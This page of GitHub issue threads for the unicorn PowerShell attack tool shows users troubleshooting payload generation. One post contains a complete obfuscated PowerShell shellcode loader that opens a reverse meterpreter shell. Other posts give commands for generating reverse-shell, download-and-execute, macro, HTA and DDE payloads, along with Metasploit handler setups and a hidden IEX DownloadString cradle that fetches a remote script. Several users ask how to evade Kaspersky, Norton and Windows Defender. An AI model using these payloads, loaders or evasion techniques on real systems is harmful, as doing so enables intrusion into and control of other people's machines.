trustedsec / unicorn Goto Github PK

hello i getting warning and my .exe is only 32 kb.
i am using: windows/download_exec exe=test.exe url=http://badurl.com/payload.exe

[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

what is cause?

Hi
I am using Kali Linux (IP: 192.168.56.103) as the C&C and a test Windows 7 x64 VM (192.168.56.201) as the client.

I run the following to generate the powershell_attack.txt and unicorn.rc command.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.56.103 443

When I copy and paste the command in the client from powershell, the window disappears and I do not get a reverse meterpreter shell on the C&C. Then, I slightly modify the powershell_attack.txt from "-w 1" to "-w 0" to ensure that the window does not disappear and I can see the error. I get the following error:

Missing expression after unary operator '-'.
At line:1 char:2
+ - <<<< e''c JABlAGgAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG.......... <omitted tldr;>.........
    + CategoryInfo          : ParserError: (-:String) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingExpressionAfterOperator

The original powershell_attack.txt file context is as shown below.

Thanks
Max

powershell -w 1 -C "s''v Wtl -;s''v Om e''c;s''v CT ((g''v Wtl).value.toString()+(g''v Om).value.toString());powershell (g''v CT).value.toString() ('JABJAEkAIAA9ACAAJwAkAGUAaAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgA'+'cgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAG0AQQBrACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAZQBoACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHUAQgBxAGUAYwAgAD0AIAAwAHgAZABhACwAMAB4AGQANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeABiAGIALAAwAHgANgA2ACwAMAB4ADIANwAsADAAeABiADQALAAwAHgAOQA2ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA1ADgALAAwAHgA'+'NwAyACwAMAB4AGMANQAsADAAeAA0ADEALAAwAHgANgBhACwAMAB4ADkAMgAsADAAeAA4AGIALAAwAHgAYQBhACwAMAB4ADkAMwAsADAAeAA2ADIALAAwAHgAZQBjACwAMAB4ADIAMwAsADAAeAA3ADYALAAwAHgANQAzACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAZgAyACwAMAB4AGMAMwAsADAAeAA5AGMALAAwAHgAMQAzACwAMAB4ADUANgAsADAAeABlAGYALAAwAHgANQA3ACwAMAB4ADcAMQAsADAAeAA0ADMALAAwAHgANgA0ACwAMAB4ADEANQAsADAAeAA1AGUALAAwAHgANgA0ACwAMAB4AGMAZAAsADAAeAA5ADAALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjAGUALAAwAHgAOAA5ACwAMAB4AGYAOQAsADAAeABjAGEALAAwAHgANABjACwAMAB4AGQAMAAsADAAeAAyAGQALAAwAHgAMgBkACwAMAB4ADYAZAAsADAAeAAxAGIALAAwAHgAMgAwACwAMAB4ADIAYwAsADAAeABhAGEALAAwAHgANAA2ACwAMAB4AGMAOQAsADAAeAA3AGMALAAwAHgANgAzACwAMAB4ADAAYwAsADAAeAA3AGMALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA1ADgALAAwAHgAYgBkACwAMAB4ADEAYQAsADAAeAA1AGEALAAwAHgANABjACwAMAB4AGMANQAsADAAeABmAGYALAAwAHgAMgBhACwAMAB4ADYAZgAsADAAeABlADQALAAwAHgANQAxACwAMAB4ADIAMQAsADAAeAAzADYALAAwAHgAMgA2ACwAMAB4ADUAMwAsADAAeABlADYA'+'LAAwAHgANAAyACwAMAB4ADYAZgAsADAAeAA0AGIALAAwAHgAZQBiACwAMAB4ADYAZgAsADAAeAAzADkALAAwAHgAZQAwACwAMAB4AGQAZgAsADAAeAAwADQALAAwAHgAYgA4ACwAMAB4ADIAMAAsADAAeAAyAGUALAAwAHgAZQA0ACwAMAB4ADEANwAsADAAeAAwAGQALAAwAHgAOQBmACwAMAB4ADEANwAsADAAeAA2ADkALAAwAHgANAA5ACwAMAB4ADIANwAsADAAeABjADgALAAwAHgAMQBjACwAMAB4AGEAMwAsADAAeAA1ADQALAAwAHgANwA1ACwAMAB4ADIANwAsADAAeAA3ADAALAAwAHgAMgA3ACwAMAB4AGEAMQAsADAAeABhADIALAAwAHgANgAzACwAMAB4ADgAZgAsADAAeAAyADIALAAwAHgAMQA0ACwAMAB4ADQAOAAsADAAeAAyAGUALAAwAHgAZQA2ACwAMAB4AGMAMwAsADAAeAAxAGIALAAwAHgAMwBjACwAMAB4ADQAMwAsADAAeAA4ADcALAAwAHgANAA0ACwAMAB4ADIAMAAsADAAeAA1ADIALAAwAHgANAA0ACwAMAB4AGYAZgAsADAAeAA1AGMALAAwAHgAZABmACwAMAB4ADYAYgAsADAAeABkADAALAAwAHgAZAA1ACwAMAB4ADkAYgAsADAAeAA0AGYALAAwAHgAZgA0ACwAMAB4AGIAZQAsADAAeAA3ADgALAAwAHgAZgAxACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgBlACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAYwA1ACwAMAB4ADgAZgAsADAAeABhAGEALAAwAHgAYQA1ACwAMAB4AGUAYgAsADAA'+'eABjADQALAAwAHgAYwA2ACwAMAB4AGUANwAsADAAeAA2ADMALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAAxADcALAAwAHgANwAzACwAMAB4ADIANgAsADAAeAA3AGMALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeABlADkALAAwAHgAZAA2ACwAMAB4AGUAMwAsADAAeABlADkALAAwAHgANgAyACwAMAB4AGYAMQAsADAAeABmADQALAAwAHgAMABlACwAMAB4ADUAOQAsADAAeAA0ADUALAAwAHgANgBhACwAMAB4AGYAMQAsADAAeAA2ADIALAAwAHgAYgA2ACwAMAB4AGEAMgAsADAAeAAzADUALAAwAHgAMwA2ACwAMAB4AGUANgAsADAAeABkAGMALAAwAHgAOQBjACwAMAB4ADMANwAsADAAeAA2AGQALAAwAHgAMQBkACwAMAB4ADIAMQAsADAAeABlADIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABiADUALAAwAHgAYwBkACwAMAB4ADcANQAsADAAeAAxAGYALAAwAHgAMgAyACwAMAB4AGEANgAsADAAeAA4ADcALAAwAHgANgAwACwAMAB4AGEAZAAsADAAeAA4AGQALAAwAHgAMAAxACwAMAB4ADgANgAsADAAeABmAGQALAAwAHgAYQAxACwAMAB4ADQAMQAsADAAeAAxADcALAAwAHgAYgBkACwAMAB4ADEAMQAsADAAeAAyADIALAAwAHgAYwA3ACwAMAB4ADUANQAsADAAeAA3ADgALAAwAHgAYQBkACwAMAB4ADMAOAAsADAAeAA0ADUALAAwAHgAOAAzACwAMAB4ADYANwAsADAAeAA1ADEALAAwAHgAZQBmACwAMAB4ADYA'+'YwAsADAAeABkAGUALAAwAHgAMAA5ACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgANwBiACwAMAB4AGMAMQAsADAAeAAzADYALAAwAHgAZAA5ACwAMAB4ADUAMQAsADAAeABhAGYALAAwAHgANwA4ACwAMAB4ADUAMQAsADAAeAA1ADYALAAwAHgANABmACwAMAB4ADMANgAsADAAeAA5ADIALAAwAHgAMQAzACwAMAB4ADQAMwAsADAAeABhAGUALAAwAHgANQAyACwAMAB4ADYAZQAsADAAeAAzADkALAAwAHgANwA4ACwAMAB4ADYAYwAsADAAeAA0ADQALAAwAHgANQA0ACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeABkADMALAAwAHgAOQA0ACwAMAB4ADYAOQAsADAAeAAyADYALAAwAHgAMQAzACwAMAB4ADMAYgAsADAAeAA5ADEALAAwAHgAMABkACwAMAB4ADIAOAAsADAAeABmADIALAAwAHgAMAA3ACwAMAB4AGUAZQAsADAAeAA0ADYALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABlAGUALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeAA4AGQALAAwAHgAZQBlACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAZgA2ACwAMAB4AGIAYwAsADAAeAAxAGIALAAwAHgANQA2ACwAMAB4ADIAMwAsADAAeABkADEALAAwAHgAYgAwACwAMAB4AGMAMwAsADAAeABjAGMALAAwAHgAOAAwACwAMAB4ADYANQAsADAAeAA0ADMALAAwAHgAYQA1ACwAMAB4ADIAZQAsADAAeAA1ADAALAAwAHgAYQAzACwA'+'MAB4ADYAYQAsADAAeABkADAALAAwAHgAYgA3ACwAMAB4ADMANQAsADAAeAA1ADYALAAwAHgAMAA3ACwAMAB4AGYAMQAsADAAeAA0ADMALAAwAHgAYgA2ACwAMAB4ADkAYgA7ACQAdQBCAHEAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAdQBCAHEAZQBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHUAQgBxACAAPQAgACQAdQBCAHEAZQBjAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBjAD0AJABtAEEAawA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHUAQgBxACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAegBwAFoAPQAwADsAJAB6AHAAWgAgAC0AbABlACAAKAAkAHUAQgBxAGUAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJAB6AHAAWgArACsAKQAgAHsAJABtAEEAawA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAYwAuAFQAbwBJAG4AdAAzADIAKAApACsAJAB6AHAAWgApACwAIAAkAHUAQgBxAGUAYwBbACQAegBwAFoAXQAsACAAMQApAH0AOwAkAG0AQQBrADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABaAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAEkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4A'+'QwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABJAEkAKQApADsAJABkAEMAcwAgAD0AIAAiAC0AZQAnACcAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBuAFIAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBuAFIAIAAkAGQAQwBzACAAJABJAGMAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAZABDAHMAIAAkAEkAYwAiADsAfQA=')"

Metasploit meterpreter too limited.Download&exec payload would be great, i can implement to unicorn soon if nobody already done it.

https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/windows/download_exec.rb

HI,

python unicorn.py windows/download_exec exe=test.exe url=https://down.uploadfiles.io/get/26k20 macro

I used this command to download and execute a file. The macro is generated but the file is not downloaded or executed.

hi
I generate payload with unicorn in kali 2016.when i run pwershell.bat dont give any access to me .dont return session in kali.
i think your code dont work.
please help me .
thanks

Hi there, when i create a macro attack vector, when its run, powershell crashes, what could be causing it?

Dear trustedsec,

There was a misunderstanding about my prior post. Now, let me explain clearly.
I'm going to generate a powershell_attack.txt through unicorn.py tool and then use it to attack a target via metasploit. However, that powershell_attack.txt is stable for just some hours and after a period of time it will be expired or not working anymore.
I would be very grateful if you give me some information about this matter.
Is there any way to stabilize that powershell_attack.txt code for more time and use it for another time?

Regards,

Hi Dear,

Since version 2.3.4 released, powershell_attack.txt Not Work!
I try this command:
python unicorn.py windows/meterpreter/reverse_https ip port
and convert .txt file to .bat file and run that, but powershell.exe don't open in target system (my local vm system) and listener don't receive every sessions!
In other hand this time, previous version catch by windows defender, kaspersky and norton AVs :(

Hi Kam,

Big fan of Unicorn, so i figured i would add a suggestion that I think would make it even better!

We all know that keeping development environments up2date with content from production environments is a real hassle, often involving database backups etc. Unicorn ofcourse lets us get around this!

However, a human error might occur where someone accidentally syncs content on a production environment, so it would be awesome if it was possible to disable sync for a given configuration.

Thanks even so for the script, it is a pity that this detected by so many common antivirus but is really appreciated its dedication, some way of obfuscating the code so that it is not detected?

http://nodistribute.com/result/BStaMqvhjY7uFODniRJQxN

Hi amigos
I have an issue that when I want to use the powershell.txt codes after 24h,the powershell will run but in metasploit nothing will not happen but during first 24h of generating codes every thing is okey.
I think it is related to expiry date of that payload which has set to limited hours.
plz fix this serious issue
Peace

hi guys , i have kali rolling 2.0 and show this error

File "unicorn.py", line 438
if not os.popen("msfvenom -h").read():
^
IndentationError: unexpected indent

why ?

I have been trying to use this today with Word 2016 (and Excel) without any success. I can use it with just powershell via commandline, session loads fine. But with Word (freshly installed earlier in the week in a fresh install of Win10) I get nothing. Looking at traffic, nothing comes out of machine after I open the Word file at all. I can't see any error or feedback that is any different to expectations from videos online. It does the popup saying older version of word. Just doesn't seem to send the payload to powershell.

Detect .bat

Nice project keep up the good work man.

I test this Macro Attack against Kaspersky and NOD32 but it was detected in memory and closed due it uses powershell to execute another powershell. do you think there is a way this can be bypasseed in some ways?

Thanks

python unicorn.py windows/download_exec exe=test.exe url=http://someurl.com/myexe.exe macro

generated macro not working in office,(does not download and execute my exe).

why i open the microsoft word dde nothing happen in handlers kali?

@trustedsec Hi does unicorn provide a feature to create the payload for x64, as i'm aware the payload created for x86 but i would need to create it on x64. is it possible to create the payload for macro attack in x64 if so please do guide me, thanks.

Hello I am getting below error and tried with diffrent python version but no use ...please help

[!] Shellcode was not generated for some reason. Check payload name and if Metasploit is working and try again.

i am really thankful to you to create this powerful tool.
i request you to have a look on download execute module which is not working

command
python unicorn.py windows/download_exec exe=test.exe url=http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

Well, bypass properly the AV using my own obfuscation and using the system memory.

The problem now is that, when I'm in the meterpreter and I try to migrate or open the shell, this action is suspicious and is blocked by the "victim" AV.

So, I can start the session shell, but once I'm on the session, each action or movement from meterpreter is caught by mr kspky

Any hint? thanks

Hey,

the new version is detected at runtime by Kaspersky, Symantec and McAfee. Any chance you are planing another round of obfuscation ninjutsu soon? :)

Thanks

Thanks for this awesome powershell tool trustedsec. I am just having an issue with office 2013, where i ve customised the payload to reverse_https with macro attack.

When I copy/paste the code, an error box appears stating "Too many line continuations"
Is there a way around that?

Thank you

First, thank you Dave for this awesome tool!

I've been trying to generate a DDE meterpreter/reverse_https payload but I cannot due to the payload exceeding the command line limit.

I have tried with various IPs to include the example that unicorn provides: python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Unicorn provides this warning: [!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

I am using the latest version of unicorn via this repo. Thanks again!

When i do

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

just as an example, the output of .rc file is next

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST windows/meterpreter/reverse_tcp
set LPORT 192.168.1.5
set ExitOnSession false
set EnableStageEncoding true
exploit -j

So, the payload value takes place of lhost value, and lhost is taking over the lport value. And i wonder if the generated txt file also contains appropriate code, because my msfconsole did not catch any session

macro attack in version 2.7.2 dont connect, but in version 2.6 connect with out problems

The payload will refuse to generate a reverse_https payload but other payloads will turn out fine.

Hello, i would like to know if the .bat file is on persistence mode when we are generating it.
Otherwise, if the victim opens it without connexion, Is it possible to capture a session when the connexion is put on.

I'm no longer able to generate working .hta's using unicorn. I was wondering if you could confirm this is a legitimate issue, or is this just me?

I've generated working payloads on my setup before pulling the latest from GitHub. The problem appears to be that the .hta generated has some sort of syntax error, maybe from unbalanced quotes?

Steps to Recreate

1. Clone the latest unicorn, or git pull to the latest

git clone https://github.com/trustedsec/unicorn.git

or, if you have it, update to the latest:

git pull

2. Generate an .hta file (note: no errors show while generating, it is not a problem with generating the payload, the problem appears to be with the syntax script or powershell generated)

python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta

3. Launch the .hta file on a Windows host, and observe the error:
   

Temporary Workaround

Reverting to version 2.4.2 appears to fix the issue:

git clone https://github.com/trustedsec/unicorn.git
git checkout tags/2.4.2
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta

Additional Details

I believe the issue is the quoting right before the larger base64 part of the payload (right before “STUFF” in this comparison for example). Reverting to 2.4.2, right before commit 8fc0a81, appears to resolve the error message and allow proper payload execution.

2.4.2:

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv 77 -;sv II ec;sv Z ((gv 77).value.toString()+(gv II).value.toString());powershell (gv Z).value.toString() "STUFF

2.4.3

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv CY -;sv 5S ec;sv n ((gv CY).value.toString()+(gv 5S).value.toString());powershell (gv n).value.toString() 'STUFF

So it could be related to this commit: 8fc0a81

Team,

I am trying the HTA attack on my lab (Win 10/2012). But when I access https://192.168.1.5 on victim end. I got the below error.

Server End:
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[] Started HTTPS reverse handler on https://0.0.0.0:443/
[] Starting the payload handler...
msf exploit(handler) > [] 192.168.1.100:41859 Request received for /...
[] 192.168.1.100:41859 Unknown request to / #<Rex::Proto::Http::Request:0x0000000414c0b8 @headers={"Accept"=> "text/html, application/xhtml+xml, image/jxr, /", "Host"=>"192.168.1.5", "Connection"=>"Keep-Alive", "Acce pt-Language"=>"en-IN", "User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik e Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586", "Accept-Encoding"=>"gzip, deflate"}, @auto_cl=true, @State=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @Body="", @method="GET", @raw_uri="/", @uri_ parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_m ode="hex-normal", @relative_resource="/", @body_bytes_left=0>...
[] 192.168.1.100:41877 Request received for /...
[] 192.168.1.100:41877 Unknown request to / #<Rex::Proto::Http::Request:0x0000000406e0b0 @headers={"Host"=>" 192.168.1.5", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language"= >"en-us", "Connection"=>"keep-alive", "Accept-Encoding"=>"gzip, deflate", "User-Agent"=>"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/6 02.1"}, @auto_cl=true, @State=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @Body="", @method="GE T", @raw_uri="/", @uri_parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max _size=10, @uri_encode_mode="hex-normal", @relative_resource="/", @body_bytes_left=0>...

can you try implement download_exec for HTA file? the reverse is kinda suck sometimes and would have been really good if can use download_exec command

Shares

linux 2017

i see port 443 open in canyouseeme..

Everytime I execute a payload on a windows machine (running 8) none of the attacks give me back a connection. I run the Social Engineering Toolkit version of the powershell attack and it works fine so it is not my computer.

hello unicorn working perfect , but now i cant run any of word files always gives me an error,how can i reverse that?

Hello ,

i admire your work and good work you've done here ! i am using unicorn for a long time , and i realised that i have a problem , i don't know what's wrong with it but i think i can report it here and you might be able to fix it , well the issue is simple i am generating a payload like this:

python unicorn.py windows/meterpreter/reverse_tcp HOST PORT hta .

i have my file generated and it works like a charm , but i am using a DNS as a host so it can resovle to my dynamic Ip address , the problem is that if my ip address changes , the DNS normally without any problems resovle the new one ! but ! we have a problem the HTA file doesn't resolve the new ip address from the DNS , which currently it should because the DNS has been updated , but the script doesn't!!

Please fix it :)

Hi
When i try to generate https macro it doesn’t work for me when i put code in xls or doc it doesn’t connect best case i got once "Unknown request to / with UA ... "

Looks like the format of the macro is being picked up by windows defender.
It may be a good idea to poach the output format of empire's macro payload, since that still doesn't get detected :D

Macro executes but not connect to the server.

Hi there,

I understand that TrustedSec is not responsible for the meterpreter stager, however I thought that this particular case was interesting due to the fact that SetStageEncoding was set to true.

Environment details listed below:

Norton Security (Full Trial)
Version: 22.5.2.15

Any feasible way to get around this while still being able to use Meterpreter? Is there any encoding options that I am leaving out?

The payload is being executed with the following Scheduled Task:

Powershell.exe -NoExit -Windowstyle hidden IEX ((New-Object Net.WebClient).DownloadString('http://pentestbox/powershell_attack.txt'))

Note: I'm not using powershell_attack.txt as the filename.

I got this erron witch new version.
xxx@xxxx:/unicorn# python unicorn.py
File "unicorn.py", line 438
if not os.popen("msfvenom -h").read():
^
IndentationError: unexpected indent

They are blocking all macros that try to use Powershell.exe

bad / good new. You decide.

fix formatting plz

Hi, i was wondering if you have thought of a way to initially include persistence during the generation of the payload.
Cheers

Hi

I'm using all version of python for generate shellcode, but i receive error :

python2.7 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....

python >= 3 :

python3.5 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Something went wrong, printing the error: name 'reduce' is not defined

Of course i install all dependency of python packages.
How solved it?

TNX

Hello,

Big fan, just ran into an issue with a relatively small powershell macro. When opening Word 2016, I'd expect, after "Enabling Content", that the Macro should launch automatically... but it does not. I can only launch it by navigating to "View -> Macro -> Run -> Auto_Open", and then the payload is executed successfully.

Macro was created with the "macro 500" switch and seems to be fully functional as seen when executed manually.

Thoughts? What can I do to debug this?

Sorry for opening an issue for this but i don't know where else to ask.

I have tested unicorn successfully under Windows 7 & Office 2016. Any idea what other Windows / Office versions are supported?